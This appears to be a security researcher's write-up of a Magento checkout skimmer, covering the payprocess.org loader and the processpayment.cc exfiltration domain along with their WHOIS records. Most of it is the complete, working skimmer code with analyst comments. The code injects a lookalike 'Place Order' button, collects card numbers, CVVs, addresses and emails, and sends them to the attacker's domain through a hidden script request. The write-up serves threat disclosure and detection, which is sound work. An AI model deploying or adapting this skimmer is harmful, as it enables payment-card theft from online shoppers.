There are so many skimmers these days that it’s difficult to keep up 😬

Loader

The skimmer loads from an injection into the core_config_data of the Magento database.

The injection uses the JavaScript atob function to base64-decode the payload URL: hxxps://payprocess.org/s/us_afford.js.

It’s still active at the time of this writing.

<script>
    // Loader stage: this snippet is what sits in core_config_data. The payload
    // URL is kept base64-encoded and only decoded at runtime, presumably so a
    // plain-text search of the config for the domain finds nothing.
    var sc = document.createElement("script");
    sc.type = "text/javascript";
    // Decoded value is the skimmer URL quoted in the write-up above.
    sc.src = atob('aHR0cHM6Ly9wYXlwcm9jZXNzLm9yZy9zL3VzX2FmZm9yZC5qcw==');
    // Appends the remote script to <head>, so it executes on every page
    // that renders this config value.
    document.getElementsByTagName('head')[0].appendChild(sc);
</script>

At this point do we really even need to ask who the domain is registered with? 🤣🤣

Domain Name: PAYPROCESS.ORG
Registry Domain ID: D402200000015677610-LROR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2021-03-12T03:46:04Z
Creation Date: 2021-01-10T18:33:26Z
Registry Expiry Date: 2022-01-10T18:33:26Z

payprocess.org/s/us_afford.js Skimmer

Once the JavaScript skimmer payload has been loaded from hxxps://payprocess.org/s/us_afford.js, it does its thing by listening for input to the #xtsavedcc payment fields on the checkout page of the infected website.

Skimmer listens for input to #xtsavedcc payment fields

Exfiltration -> processpayment.cc/j.js

The exfiltration URL is defined in the our_honey variable, and a custom function, sendscriptRequest, sends the skimmed payment data to processpayment.cc/j.js:

function real_send(e) {
    e.preventDefault();
    var our_honey = atob('aHR0cHM6Ly9wcm9jZXNzcGF5bWVudC5jYy9qLmpz');
    //var our_honey = atob('https://processpayment.cc/j.js');
...
    sendscriptRequest(our_honey, req, statusCall1);
...

Another NameCheap-registered domain being used for malicious purposes…

   Domain Name: PROCESSPAYMENT.CC
   Registry Domain ID: 153752740_DOMAIN_CC-VRSN
   Registrar WHOIS Server: whois.namecheap.com
   Registrar URL: http://www.namecheap.com
   Updated Date: 2021-01-10T18:39:49Z
   Creation Date: 2021-01-10T18:33:21Z
   Registry Expiry Date: 2022-01-10T18:33:21Z

Sample


<script>
    // Loader as found in core_config_data (same snippet as shown earlier in
    // the write-up). The payload URL is base64-encoded and decoded at runtime.
    var sc = document.createElement("script");
    sc.type = "text/javascript";
    // Decoded value is the skimmer URL quoted in the write-up above.
    sc.src = atob('aHR0cHM6Ly9wYXlwcm9jZXNzLm9yZy9zL3VzX2FmZm9yZC5qcw==');
    // Appended to <head>; the remote payload then runs on every page render.
    document.getElementsByTagName('head')[0].appendChild(sc);
</script>

// Exfiltration transport. Instead of XHR/fetch, the skimmed record is sent as
// the query string of a dynamically created <script> element, so on the wire
// and in logs it looks like an ordinary GET for a .js file.
//   _0xa0ebx2  base URL (our_honey in real_send)
//   _0xa0ebx3  query payload ("r=<base64 JSON>" as built in real_send); a
//              random cache-buster is prepended, giving ?rand=<Math.random()>&r=...
//   _0xa0ebx4  callback run once the script has loaded (statusCall1)
//   _0xa0ebx5  argument array for that callback (undefined as called here)
function sendscriptRequest(_0xa0ebx2, _0xa0ebx3, _0xa0ebx4, _0xa0ebx5) {
    var _0xa0ebx6 = document['createElement']('script');
    if (_0xa0ebx3) {
        _0xa0ebx3 = '?rand=' + Math['random']() + '&' + _0xa0ebx3
    } else {
        _0xa0ebx3 = '?rand=' + Math['random']()
    };
    // Custom one-shot flag read by scriptCallback so the callback fires only
    // once even though both onload and onreadystatechange are hooked.
    _0xa0ebx6['ajax_readyState'] = false;
    _0xa0ebx6['onload'] = scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5);
    _0xa0ebx6['onreadystatechange'] = scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5);
    _0xa0ebx6['src'] = _0xa0ebx2 + _0xa0ebx3;
    // Inserted next to the first existing <script> element on the page.
    document['getElementsByTagName']('script')[0]['parentNode']['appendChild'](_0xa0ebx6)
}

// Builds the onload / onreadystatechange handler for the exfil <script>
// element created in sendscriptRequest.
//   _0xa0ebx6  the script element
//   _0xa0ebx4  callback to invoke once the request has completed
//   _0xa0ebx5  argument array passed to that callback via apply()
function scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5) {
    return function() {
        // Already handled via the other event: do nothing.
        if (_0xa0ebx6['ajax_readyState']) {
            return
        };
        // Fires when readyState is absent (onload path) or has reached
        // 'loaded' / 'complete' (onreadystatechange path).
        if (!_0xa0ebx6['readyState'] || _0xa0ebx6['readyState'] === 'loaded' || _0xa0ebx6['readyState'] === 'complete') {
            _0xa0ebx6['ajax_readyState'] = true;
            _0xa0ebx4['apply'](_0xa0ebx6, _0xa0ebx5);
            // The exfil element removes itself from the DOM after firing, so a
            // DOM snapshot taken afterwards will not show it; the request is
            // still visible in browser network logs / proxy logs.
            _0xa0ebx6['parentNode']['removeChild'](_0xa0ebx6)
        }
    }
}

// Luhn (mod-10) checksum test for a card number string.
// Spaces are stripped first and an empty result fails. Any character other
// than a digit, a hyphen or whitespace rejects the value; remaining
// non-digits are then discarded before the checksum is computed.
// Note: nothing in the visible sample calls this function.
function valid_credit_card(value) {
    const compact = value.replace(/ /g, "");
    if (compact === '') {
        return false;
    }
    if (/[^0-9-\s]+/.test(compact)) {
        return false;
    }
    const digits = compact.replace(/\D/g, "");
    let total = 0;
    let doubleIt = false;
    // Walk right-to-left, doubling every second digit (Luhn).
    for (let i = digits.length - 1; i >= 0; i -= 1) {
        let d = Number(digits.charAt(i));
        if (doubleIt) {
            d *= 2;
            if (d > 9) {
                d -= 9;
            }
        }
        total += d;
        doubleIt = !doubleIt;
    }
    return total % 10 === 0;
}
// Record template that gets JSON-serialised and exfiltrated by real_send.
// Only sid, dbg_card, dbg_exp, dbg_cvv, dbg_first, dbg_last, dbg_addr,
// dbg_city, dbg_state, dbg_zip, dbg_email and dbg_add2 are ever populated
// there; dbg_ssn, dbg_dob, dbg_dl and dbg_add1 stay empty, which suggests a
// reused kit template. The key names are a usable signature for the
// base64-decoded "r=" parameter of the exfil request.
var obj_31337 = {};
obj_31337.dbg_card = '';
obj_31337.dbg_exp = '';
obj_31337.dbg_cvv = '';
obj_31337.dbg_first = '';
obj_31337.dbg_last = '';
obj_31337.dbg_addr = '';
obj_31337.dbg_city = '';
obj_31337.dbg_state = '';
obj_31337.dbg_zip = '';
obj_31337.dbg_email = '';
obj_31337.dbg_ssn = '';
obj_31337.dbg_dob = '';
obj_31337.dbg_dl = '';
obj_31337.dbg_add1 = '';
obj_31337.dbg_add2 = '';
obj_31337.sid = '';

// Reads cookie `a` from document.cookie with a regex; returns '' when absent.
// Not called anywhere in the visible sample (likely a leftover kit helper).
function getCookieValue(a) {
    var b = document.cookie.match('(^|;)\\s*' + a + '\\s*=\\s*([^;]+)');
    return b ? b.pop() : '';
}

// Click handler of the lookalike "Place order now" button that real_set
// injects; it runs in place of the genuine place-order click, harvests the
// checkout form, exfiltrates it, then forwards the click to the real button.
function real_send(e) {
    e.preventDefault();
    // Exfiltration endpoint, base64-decoded at runtime (decoded value is
    // given in the write-up above).
    var our_honey = atob('aHR0cHM6Ly9wcm9jZXNzcGF5bWVudC5jYy9qLmpz');
    // Campaign / victim tag sent with every record; matches the payload
    // filename us_afford.js.
    var name = 'us_afford';
    // Only harvest when the #xtsavedcc card option is visible and selected;
    // otherwise forward the click to the hidden original button so the
    // checkout proceeds normally and nothing looks broken to the shopper.
    if (jQuery('#xtsavedcc:visible:checked').length === 0) {
        jQuery('button[data1=origin]').click();
        return false;
    }
    obj_31337['sid'] = name;
    // Card data straight from the xtsavedcc_* form fields.
    obj_31337['dbg_card'] = jQuery('#xtsavedcc_cc_number').val();
    obj_31337['dbg_exp'] = jQuery('#xtsavedcc_expiration').find('option:selected').val() + '/' + jQuery('#xtsavedcc_expiration_yr').find('option:selected').val();
    obj_31337['dbg_cvv'] = jQuery('#xtsavedcc_cc_cid').val();
    obj_31337['dbg_first'] = jQuery('#xtsavedcc_cc_name').val();
    obj_31337['dbg_last'] = '';
    // Billing details: the form inputs are read first; when a field is empty
    // the code falls back to window.customerData.addresses (presumably the
    // store's logged-in customer data — verify against the platform).
    // NOTE(review): if a street input is absent, .val() is undefined and the
    // concatenation becomes "undefinedundefined", so the fallback never fires.
    var addr = jQuery('input[name="street[0]"]').val() + jQuery('input[name="street[1]"]').val();
    var addr_obj = undefined;
    if (addr === '') {
        if (typeof(window.customerData) !== "undefined") {
            if (typeof(window.customerData.addresses) != "undefined") {
                if (Object.keys(window.customerData.addresses).length > 0) {
                    // First stored address only.
                    var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
                    addr_obj = window.customerData.addresses[addr_key];
                    addr = addr_obj.street[0];
                }
            }
        }
    }
    obj_31337['dbg_addr'] = addr;
    var city = jQuery("input[name='city']").val();
    // Same customerData fallback as for addr (copy-pasted).
    if (city === '') {
        if (typeof(window.customerData) !== "undefined") {
            if (typeof(window.customerData.addresses) != "undefined") {
                if (Object.keys(window.customerData.addresses).length > 0) {
                    var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
                    addr_obj = window.customerData.addresses[addr_key];
                    city = addr_obj.city;
                }
            }
        }
    }
    obj_31337['dbg_city'] = city;
    obj_31337['dbg_state'] = jQuery("select[name=region_id]:eq(0)").find("option:selected").text();
    var zip = jQuery("input[name=postcode]").val();
    // Same customerData fallback again.
    if (zip === '') {
        if (typeof(window.customerData) !== "undefined") {
            if (typeof(window.customerData.addresses) != "undefined") {
                if (Object.keys(window.customerData.addresses).length > 0) {
                    var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
                    addr_obj = window.customerData.addresses[addr_key];
                    zip = addr_obj.postcode;
                }
            }
        }
    }
    obj_31337['dbg_zip'] = zip;
    var email = jQuery("input[id='customer-email']").val();
    if (email === '') {
        if (typeof(window.customerData) !== "undefined") {
            if (typeof(window.customerData.email) !== 'undefined') {
                email = window.customerData.email;
            }
        }
    }
    obj_31337['dbg_email'] = email;
    // Phone number lands in the otherwise unused dbg_add2 slot.
    obj_31337['dbg_add2'] = jQuery('input[name=telephone]').val();
    // Serialise the whole record, base64 it and ship it as the "r=" query
    // parameter of a script request (see sendscriptRequest). In logs this
    // appears as a GET for j.js?rand=<number>&r=<base64 JSON>.
    var obj_str = JSON.stringify(obj_31337);
    var obj_b64 = btoa(obj_str);
    var req = "r=" + obj_b64;

    // Runs once the exfil script has loaded: click the genuine (hidden)
    // place-order button so the victim's order still goes through.
    function statusCall1() {
        jQuery('button[data1=origin]').click();
    }
    sendscriptRequest(our_honey, req, statusCall1);
}

// Swaps the checkout's place-order button for a lookalike. The real button
// (id onestepcheckout-button-place-order) is tagged data1="origin" so the
// skimmer can find and click it later, hidden, and followed by a new button
// #btn123 whose inline onclick calls real_send. An unexpected button with
// this id / onclick on the checkout page is a simple DOM-level indicator.
function real_set() {
    jQuery("button[id=onestepcheckout-button-place-order]:visible").attr('data1', 'origin');
    jQuery('button[data1="origin"]').hide().after('<button id="btn123" onclick="real_send(event)" class="btn-proceed-checkout onestepcheckout-btn-checkout onestepcheckout-place" type="button" title="Place Order"><span><span>Place order now</span></span></button>');
    // Strip any jQuery handlers from the injected button (called twice,
    // presumably redundantly).
    jQuery("#btn123").unbind().unbind();
}
// Poll every 500 ms until the place-order button appears (see searchFunction).
var myVar = setInterval(searchFunction, 500);

// Interval callback: once exactly one visible place-order button exists,
// install the lookalike button (real_set) and stop polling.
function searchFunction() {
    var found = jQuery("#onestepcheckout-button-place-order:visible").length;
    if (found === 1) {
        real_set();
        clearInterval(myVar);
    } else {}
}

// Empty stubs; neither does anything in this sample and they look like
// leftovers from a kit template.
function called_outside_ready() {}

function called_inside_ready() {}
called_outside_ready();
// No-op on DOMContentLoaded; the real hook is the setInterval poll above.
document.addEventListener("DOMContentLoaded", function(event) {
    called_inside_ready();
})